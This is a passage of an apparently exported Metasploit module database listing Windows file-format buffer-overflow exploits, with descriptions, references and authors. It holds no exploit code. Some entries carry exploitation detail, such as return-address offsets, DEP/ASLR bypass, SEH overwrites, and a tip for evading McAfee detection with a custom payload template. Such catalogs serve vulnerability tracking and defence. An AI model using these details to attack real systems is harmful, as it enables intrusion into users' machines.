CVE-2008-5405, EDB-7329, OSVDB-50342","Trancek " 603,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb","exploit","windows/fileformat/ccmplayer_m3u_bof","exploit/windows/fileformat/ccmplayer_m3u_bof","CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow",400,"This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an invalid read of an injectible address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7.","Metasploit Framework License (BSD)","f","2011-11-30 00:00:00",0,,"aggressive","t","EDB-18178, OSVDB-77453","Rh0" 604,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb","exploit","windows/fileformat/coolpdf_image_stream_bof","exploit/windows/fileformat/coolpdf_image_stream_bof","Cool PDF Image Stream Buffer Overflow",300,"This module exploits a stack buffer overflow in Cool PDF Reader prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-01-18 00:00:00",0,,"aggressive","t","CVE-2012-4914, EDB-24463, OSVDB-89349, URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70","Chris Gabriel, Francis Provencher, juan vazquez " 605,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/csound_getnum_bof.rb","exploit","windows/fileformat/csound_getnum_bof","exploit/windows/fileformat/csound_getnum_bof","Csound hetro File Handling Stack Buffer Overflow",300,"This module exploits a buffer overflow in Csound before 5.16.6. The overflow occurs when trying to import a malicious hetro file from tabular format. In order to achieve exploitation the user should import the malicious file through csound with a command like ""csound -U het_import msf.csd file.het"". This exploit doesn't work if the ""het_import"" command is used directly to convert the file.","Metasploit Framework License (BSD)","f","2012-02-23 00:00:00",0,,"aggressive","t","BID-52144, CVE-2012-0270, OSVDB-79491, URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f, URL-http://secunia.com/secunia_research/2012-3/","Secunia, juan vazquez " 606,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cutezip_bof.rb","exploit","windows/fileformat/cutezip_bof","exploit/windows/fileformat/cutezip_bof","GlobalSCAPE CuteZIP Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow vulnerability in version 2.1 of CuteZIP. In order for the command to be executed, an attacker must convince the target user to open a specially crafted zip file with CuteZIP. By doing so, an attacker can execute arbitrary code as the target user.","Metasploit Framework License (BSD)","f","2011-02-12 00:00:00",0,,"aggressive","t","BID-46375, EDB-16162","C4SS!0 G0M3S , juan vazquez " 607,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb","exploit","windows/fileformat/cyberlink_p2g_bof","exploit/windows/fileformat/cyberlink_p2g_bof","CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",500,"This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x The vulnerability is triggered when opening a malformed p2g file containing an overly long string in the 'name' attribute of the file element. This results in overwriting a structured exception handler record.","Metasploit Framework License (BSD)","f","2011-09-12 00:00:00",0,,"aggressive","t","BID-50997, OSVDB-77600, UDB-18220, US-CERT-VU-158003","modpr0be , mr_me " 608,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cytel_studio_cy3.rb","exploit","windows/fileformat/cytel_studio_cy3","exploit/windows/fileformat/cytel_studio_cy3","Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",400,"This module exploits a stack based buffer overflow found in Cytel Studio <= 9.0. The overflow is triggered during the copying of strings to a stack buffer of 256 bytes.","Metasploit Framework License (BSD)","f","2011-10-02 00:00:00",0,,"aggressive","t","BID-49924, OSVDB-75991, URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt","James Fitts , Luigi Auriemma" 609,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/deepburner_path.rb","exploit","windows/fileformat/deepburner_path","exploit/windows/fileformat/deepburner_path","AstonSoft DeepBurner (DBR File) Path Buffer Overflow",500,"This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extention is registered to DeepBurner.","Metasploit Framework License (BSD)","f","2006-12-19 00:00:00",0,,"aggressive","t","BID-21657, CVE-2006-6665, EDB-11315, EDB-2950, EDB-8335, OSVDB-32356","Expanders, fl0 fl0w, jduck " 610,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/destinymediaplayer16.rb","exploit","windows/fileformat/destinymediaplayer16","exploit/windows/fileformat/destinymediaplayer16","Destiny Media Player 1.61 PLS M3U Buffer Overflow",400,"This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61. An attacker must send the file to victim and the victim must open the file. File-->Open Playlist","Metasploit Framework License (BSD)","f","2009-01-03 00:00:00",0,,"aggressive","t","BID-33091, CVE-2009-3429, EDB-7651, OSVDB-53249","Trancek " 611,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/digital_music_pad_pls.rb","exploit","windows/fileformat/digital_music_pad_pls","exploit/windows/fileformat/digital_music_pad_pls","Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow",300,"This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-09-17 00:00:00",0,,"aggressive","t","EDB-15134, OSVDB-68178, URL-http://secunia.com/advisories/41519/","Abhishek Lyall " 612,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/djstudio_pls_bof.rb","exploit","windows/fileformat/djstudio_pls_bof","exploit/windows/fileformat/djstudio_pls_bof","DJ Studio Pro 5.1 .pls Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2. When handling a .pls file, DJ Studio will copy the user-supplied data on the stack without any proper bounds checking done beforehand, therefore allowing code execution under the context of the user.","Metasploit Framework License (BSD)","f","2009-12-30 00:00:00",0,,"aggressive","t","CVE-2009-4656, EDB-10827, OSVDB-58159","Death-Shadow-Dark , Sebastien Duquette" 613,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/djvu_imageurl.rb","exploit","windows/fileformat/djvu_imageurl","exploit/windows/fileformat/djvu_imageurl","DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",100,"This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.","Metasploit Framework License (BSD)","f","2008-10-30 00:00:00",0,,"aggressive","t","BID-31987, CVE-2008-4922, OSVDB-49592","dean " 614,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/dvdx_plf_bof.rb","exploit","windows/fileformat/dvdx_plf_bof","exploit/windows/fileformat/dvdx_plf_bof","DVD X Player 5.5 .plf PlayList Buffer Overflow",300,"This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, and then copy it on the stack without any proper bounds checking, which casues a buffer overflow, and results arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.","Metasploit Framework License (BSD)","f","2007-06-02 00:00:00",0,,"aggressive","t","BID-24278, CVE-2007-3068, EDB-17745, OSVDB-36956","D3r K0n!G, n00b, sickness, sinn3r " 615,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb","exploit","windows/fileformat/emc_appextender_keyworks","exploit/windows/fileformat/emc_appextender_keyworks","EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",200,"This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control (KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's Documentation ApplicationXtender 5.4.","Metasploit Framework License (BSD)","f","2009-09-29 00:00:00",0,,"aggressive","t","BID-36546, OSVDB-58423","MC " 616,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb","exploit","windows/fileformat/erdas_er_viewer_bof","exploit/windows/fileformat/erdas_er_viewer_bof","ERS Viewer 2011 ERS File Handling Buffer Overflow",300,"This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the function ERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-04-23 00:00:00",0,,"aggressive","t","BID-59379, CVE-2013-0726, OSVDB-92694, URL-http://secunia.com/advisories/51725/","Parvez Anwar, juan vazquez " 617,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb","exploit","windows/fileformat/esignal_styletemplate_bof","exploit/windows/fileformat/esignal_styletemplate_bof","eSignal and eSignal Pro <= 10.6.2425.1208 file parsing buffer overflow in QUO",300,"The software is unable to handle the """" files (even those original included in the program) like those with the registered extensions QUO, SUM and POR. Successful exploitation of this vulnerability may take up to several seconds due to the use of egghunter. Also, DEP bypass is unlikely due to the limited space for payload.","Metasploit Framework License (BSD)","f","2011-09-06 00:00:00",0,,"aggressive","t","BID-49600, CVE-2011-3494, EDB-17837, OSVDB-75456, URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt","Luigi Auriemma, TecR0c , mr_me " 618,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/etrust_pestscan.rb","exploit","windows/fileformat/etrust_pestscan","exploit/windows/fileformat/etrust_pestscan","CA eTrust PestPatrol ActiveX Control Buffer Overflow",200,"This module exploits a stack buffer overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-11-02 00:00:00",0,,"aggressive","t","CVE-2009-4225, OSVDB-60862, URL-http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm","MC " 619,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ezip_wizard_bof.rb","exploit","windows/fileformat/ezip_wizard_bof","exploit/windows/fileformat/ezip_wizard_bof","eZip Wizard 3.0 Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow vulnerability in version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with eZip Wizard, and access the specially file via double-clicking it. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2009-03-09 00:00:00",0,,"aggressive","t","BID-34044, CVE-2009-1028, EDB-12059, EDB-8180, OSVDB-52815, URL-http://www.edisys.com/","Lincoln, fl0 fl0w, jduck " 620,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/fatplayer_wav.rb","exploit","windows/fileformat/fatplayer_wav","exploit/windows/fileformat/fatplayer_wav","Fat Player Media Player 0.6b0 Buffer Overflow",300,"This module exploits a buffer overflow in Fat Player 0.6b. When the application is used to import a specially crafted wav file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-10-18 00:00:00",0,,"aggressive","t","CVE-2009-4962, EDB-15279, OSVDB-57343","James Fitts , dookie" 621,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/fdm_torrent.rb","exploit","windows/fileformat/fdm_torrent","exploit/windows/fileformat/fdm_torrent","Free Download Manager Torrent Parsing Buffer Overflow",400,"This module exploits a stack buffer overflow in Free Download Manager 3.0 Build 844. Arbitrary code execution could occur when parsing a specially crafted torrent file.","Metasploit Framework License (BSD)","f","2009-02-02 00:00:00",0,,"aggressive","t","BID-33555, CVE-2009-0184, OSVDB-54033, URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl, URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18, URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18, URL-http://secunia.com/secunia_research/2009-5/","SkD , jduck " 622,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/feeddemon_opml.rb","exploit","windows/fileformat/feeddemon_opml","exploit/windows/fileformat/feeddemon_opml","FeedDemon <= 3.1.0.12 Stack Buffer Overflow",500,"This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application is used to import a specially crafted opml file, a buffer overflow occurs allowing arbitrary code execution. All versions are suspected to be vulnerable. This vulnerability was originally reported against version 2.7 in February of 2009.","Metasploit Framework License (BSD)","f","2009-02-09 00:00:00",0,,"aggressive","t","BID-33630, CVE-2009-0546, EDB-11379, EDB-7995, EDB-8010, OSVDB-51753","dookie, fl0 fl0w, jduck " 623,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb","exploit","windows/fileformat/foxit_reader_filewrite","exploit/windows/fileformat/foxit_reader_filewrite","Foxit PDF Reader 4.2 Javascript File Write",300,"This module exploits an unsafe Javascript API implemented in Foxit PDF Reader version 4.2. The createDataObject() Javascript API function allows for writing arbitrary files to the file system. This issue was fixed in version 4.3.1.0218. Note: This exploit uses the All Users directory currently, which required administrator privileges to write to. This means an administrative user has to open the file to be successful. Kind of lame but thats how it goes sometimes in the world of file write bugs.","Metasploit Framework License (BSD)","f","2011-03-05 00:00:00",0,,"aggressive","t","OSVDB-71104, URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html","Chris Evans, bannedit " 624,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/foxit_reader_launch.rb","exploit","windows/fileformat/foxit_reader_launch","exploit/windows/fileformat/foxit_reader_launch","Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",400,"This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. Due to the way Foxit Reader handles the input from an ""Launch"" action, it is possible to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2009-03-09 00:00:00",0,,"aggressive","t","BID-34035, CVE-2009-0837, OSVDB-55614, URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities","Francisco Falcon, bannedit " 625,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/foxit_title_bof.rb","exploit","windows/fileformat/foxit_title_bof","exploit/windows/fileformat/foxit_title_bof","Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.","Metasploit Framework License (BSD)","f","2010-11-13 00:00:00",0,,"aggressive","t","EDB-15532, OSVDB-68648, URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/","Sud0, corelanc0d3r , dookie, jduck " 626,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb","exploit","windows/fileformat/free_mp3_ripper_wav","exploit/windows/fileformat/free_mp3_ripper_wav","Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow",500,"This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious WAV file.","Metasploit Framework License (BSD)","f","2011-08-27 00:00:00",0,,"aggressive","t","EDB-11975, EDB-17727, OSVDB-63349","James Fitts , Richard Leahy, Tiago Henriques, X-h4ck" 627,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/galan_fileformat_bof.rb","exploit","windows/fileformat/galan_fileformat_bof","exploit/windows/fileformat/galan_fileformat_bof","gAlan 0.2.1 Buffer Overflow",300,"This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially crafted galan file.","Metasploit Framework License (BSD)","f","2009-12-07 00:00:00",0,,"aggressive","t","EDB-10339, OSVDB-60897","Jeremy Brown <0xjbrown41@gmail.com>, loneferret" 628,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/gsm_sim.rb","exploit","windows/fileformat/gsm_sim","exploit/windows/fileformat/gsm_sim","GSM SIM Editor 5.15 Buffer Overflow",300,"This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15. When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer overflow occurs which allows an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-07-07 00:00:00",0,,"aggressive","t","EDB-14258","Lincoln , Ruben Alejandro, chap0 " 629,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/gta_samp.rb","exploit","windows/fileformat/gta_samp","exploit/windows/fileformat/gta_samp","GTA SA-MP server.cfg Buffer Overflow",300,"This module exploits a stack-based buffer overflow in GTA SA-MP Server. This buffer overflow occurs when the application attempts to open a malformed server.cfg file. To exploit this vulnerability, an attacker must send the victim a server.cfg file and have them run samp-server.exe.","Metasploit Framework License (BSD)","f","2011-09-18 00:00:00",0,,"aggressive","t","EDB-17893","Silent_Dream" 630,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb","exploit","windows/fileformat/hhw_hhp_compiledfile_bof","exploit/windows/fileformat/hhw_hhp_compiledfile_bof","HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",400,"This module exploits a stack buffer overflow in HTML Help Workshop 4.74 By creating a specially crafted hhp file, an an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2006-02-06 00:00:00",0,,"aggressive","t","CVE-2006-0564, EDB-1488, EDB-1490, OSVDB-22941","bratax, jduck " 631,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb","exploit","windows/fileformat/hhw_hhp_contentfile_bof","exploit/windows/fileformat/hhw_hhp_contentfile_bof","HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",400,"This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.","Metasploit Framework License (BSD)","f","2006-02-06 00:00:00",0,,"aggressive","t","CVE-2006-0564, EDB-1470, EDB-1495, OSVDB-22941","bratax, jduck " 632,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb","exploit","windows/fileformat/hhw_hhp_indexfile_bof","exploit/windows/fileformat/hhw_hhp_indexfile_bof","HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",400,"This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.","Metasploit Framework License (BSD)","f","2009-01-17 00:00:00",0,,"aggressive","t","BID-33189, CVE-2009-0133, EDB-10323, EDB-10335, OSVDB-22941","Encrypt3d.M!nd, jduck , loneferret" 633,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb","exploit","windows/fileformat/ht_mp3player_ht3_bof","exploit/windows/fileformat/ht_mp3player_ht3_bof","HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",400,"This module exploits a stack buffer overflow in HT-MP3Player 1.0. Arbitrary code execution could occur when parsing a specially crafted .HT3 file. NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file.","Metasploit Framework License (BSD)","f","2009-06-29 00:00:00",0,,"aggressive","t","CVE-2009-2485, EDB-9034, EDB-9038, OSVDB-55449","His0k4, hack4love , jduck " 634,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ibm_pcm_ws.rb","exploit","windows/fileformat/ibm_pcm_ws","exploit/windows/fileformat/ibm_pcm_ws","IBM Personal Communications iSeries Access WorkStation 5.9 Profile",500,"The IBM Personal Communications I-Series application WorkStation is susceptible to a stack-based buffer overflow vulnerability within file parsing in which data copied to a location in memory exceeds the size of the reserved destination area. The buffer is located on the runtime program stack. When the WorkStation file is opened it will reach the code path at 0x67575180 located in pcspref.dll which conducts string manipulation and validation on the data supplied in the WorkStation file. The application will first check if 'Profile' header exists and appends a dot with the next parameter within the file. It will then measure the character length of the header by calling strcspn with a dot as its null-terminated character. It will then write the header into memory and ensure the header ends with a NUL character. The parameter character array is passed to the strcpy() function. The application has declared a 52-element character array for the destination for strcpy function. The function does not perform bounds checking therefore, data can be written paste the end of the buffer variable resulting in corruption of adjacent variables including other local variables, program state information and function arguments. You will notice that the saved RETURN address at offset 0x6c is overwritten by the data written past the buffer. To ensure we can perform arbitrary code execution we must we provide a valid pointer at 0x74 which is used as a argument for the called function at 0x675751ED as a id file extension parameter. Once the caller regains control we will reach our RETURN. The Ret instruction will be used to pop the overwritten saved return address which was currupted. This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform. Versions tested: IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a Which bundles pcsws.exe version 5090.27271.709 Tested on: Microsoft Windows XP [Version 5.1.2600] Microsoft Windows Vista [Version 6.0.6002] Microsoft Windows 7 [Version 6.1.7600]","Metasploit Framework License (BSD)","f","2012-02-28 00:00:00",0,,"aggressive","t","CVE-2012-0201, OSVDB-79657, URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166","TecR0c " 635,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ideal_migration_ipj.rb","exploit","windows/fileformat/ideal_migration_ipj","exploit/windows/fileformat/ideal_migration_ipj","PointDev IDEAL Migration Buffer Overflow",500,"This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. By creating a specially crafted ipj file, an an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH","Metasploit Framework License (BSD)","f","2009-12-05 00:00:00",0,,"aggressive","t","CVE-2009-4265, EDB-10319, EDB-12403, EDB-12404, EDB-12540, OSVDB-60681","Dr_IDE, dookie, jduck " 636,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb","exploit","windows/fileformat/irfanview_jpeg2000_bof","exploit/windows/fileformat/irfanview_jpeg2000_bof","Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow vulnerability in version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been tested on a specific version of irfanview (v4.3.2), although other versions may work also. The vulnerability is triggered via parsing an invalid qcd chunk structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon and drag/drop the file into Irfanview\'s window. An egg hunter is used for stability.","Metasploit Framework License (BSD)","f","2012-01-16 00:00:00",0,,"aggressive","t","BID-51426, CVE-2012-0897, OSVDB-78333, URL-http://www.greyhathacker.net/?p=525","Parvez Anwar , juan vazquez , mr_me " 637,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb","exploit","windows/fileformat/ispvm_xcf_ispxcf","exploit/windows/fileformat/ispvm_xcf_ispxcf","Lattice Semiconductor ispVM System XCF File Handling Overflow",300,"This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially crafted file, when a long value is supplied for the version attribute of the ispXCF tag. It results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-05-16 00:00:00",0,,"aggressive","t","BID-53562, OSVDB-82000, URL-http://secunia.com/advisories/48740/","Unknown, juan vazquez " 638,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb","exploit","windows/fileformat/kingview_kingmess_kvl","exploit/windows/fileformat/kingview_kingmess_kvl","KingView Log File Parsing Buffer Overflow",300,"This module exploits a vulnerability found in KingView <= 6.55. It exists in the KingMess.exe application when handling log files, due to the insecure usage of sprintf. This module uses a malformed .kvl file which must be opened by the victim via the KingMess.exe application, through the 'Browse Log Files' option. The module has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-20 00:00:00",0,,"aggressive","t","BID-57909, CVE-2012-4711, OSVDB-89690, URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf","Carlos Mario Penagos Hollman, Lucas Apa, juan vazquez " 639,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/lattice_pac_bof.rb","exploit","windows/fileformat/lattice_pac_bof","exploit/windows/fileformat/lattice_pac_bof","Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",300,"This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer 6.21. As a .pac file, when supplying a long string of data to the 'value' field under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption on the stack, which results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-05-16 00:00:00",0,,"aggressive","t","BID-53566, CVE-2012-2915, EDB-19006, OSVDB-82001, URL-http://secunia.com/advisories/48741","Unknown, juan vazquez , sinn3r " 640,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/lotusnotes_lzh.rb","exploit","windows/fileformat/lotusnotes_lzh","exploit/windows/fileformat/lotusnotes_lzh","Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",400,"This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net","Metasploit Framework License (BSD)","f","2011-05-24 00:00:00",0,,"passive","t","BID-48018, CVE-2011-1213, OSVDB-72706, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904, URL-http://www.ibm.com/support/docview.wss?uid=swg21500034","alino <26alino@gmail.com>, binaryhouse.net" 641,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb","exploit","windows/fileformat/magix_musikmaker_16_mmm","exploit/windows/fileformat/magix_musikmaker_16_mmm","Magix Musik Maker 16 .mmm Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in Magix Musik Maker 16. When opening a specially crafted arrangement file (.mmm) in the application, an unsafe strcpy() will allow you to overwrite a SEH handler. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and might require up to several seconds to receive a shell.","Metasploit Framework License (BSD)","f","2011-04-26 00:00:00",0,,"aggressive","t","OSVDB-72063, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002","acidgen, corelanc0d3r " 642,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb","exploit","windows/fileformat/mcafee_hercules_deletesnapshot","exploit/windows/fileformat/mcafee_hercules_deletesnapshot","McAfee Remediation Client ActiveX Control Buffer Overflow",100,"This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When sending an overly long string to the DeleteSnapshot() method of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.","Metasploit Framework License (BSD)","f","2008-08-04 00:00:00",0,,"aggressive","t","URL-http://www.metasploit.com","MC " 643,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb","exploit","windows/fileformat/mcafee_showreport_exec","exploit/windows/fileformat/mcafee_showreport_exec","McAfee SaaS MyCioScan ShowReport Remote Command Execution",300,"This module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share ( or something similiar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.","Metasploit Framework License (BSD)","f","2012-01-12 00:00:00",0,,"passive","t","BID-51397, OSVDB-78310, 